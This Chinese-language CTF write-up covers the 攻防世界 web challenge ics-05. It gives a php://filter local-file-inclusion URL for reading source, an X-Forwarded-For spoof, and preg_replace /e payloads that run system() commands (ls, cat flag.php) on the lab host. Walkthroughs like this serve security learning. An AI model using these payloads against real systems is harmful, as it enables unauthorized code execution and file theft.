攻防世界web ics-05 writeup

考点:
文件包含 PHP伪协议
preg_replace函数/e模式下,函数将把replace中php代码直接执行

如题:
在这里插入图片描述
又是熟悉的管理系统,这次是设备维护中心出了差错
在这里插入图片描述
要注意刚点进去是什么都没有的,但是经过一番摸索点击左上角的云平台设备维护中心会出现一个新页面
在这里插入图片描述
在这里插入图片描述
虽然长得样子差不多但是url后多了一个page参数
更改参数发现显示的字样会根据url的修改而更改,起初以为是xss攻击,但是看了前辈的博客发现是文件包含漏洞,附上LFI漏洞判断

LFI漏洞的黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。

用到文件包含,根据index字样判断index.php中有后门

构造url

 http://220.249.52.133:42668/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

(这里是把页面源码进行base64加密输出,否则代码将会直接执行而不显示)
在这里插入图片描述将加密后的代码进行base64解密获取页面源代码

在这里插入图片描述阅读源码之后发现前一部分和f12看到的差不多,但是后面多出来一段
在这里插入图片描述阅读后我们发现要检查http头中的XFF是否为127.0.0.1
如果是的话就从url里获取三个参数,并进行preg_replace替换
利用这一特性我们用bp抓包改包

(ps:%26是&的url编码,在url中不能使用空格,应当使用+代替空格,编码时+自动转为空格)
在这里插入图片描述
查看网站文件目录

?pat=/test/e&rep=system("ls")&sub=test

发现s3chahahaDir目录
cd进该目录查看文件

 ?pat=/test/e&rep=system("cd+s3chahahaDir+%26%26+ls")&sub=test

在这里插入图片描述

发现有个flag路径

 ?pat=/test/e&rep=system("cd+s3chahahaDir/flag+%26%26+ls")&sub=test

在这里插入图片描述
发现有flag.php
用cat命令输出flag.php文件的内容

 ?pat=/test/e&rep=system("cat+s3chahahaDir/flag/flag.php+%26%26+ls")&sub=test

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值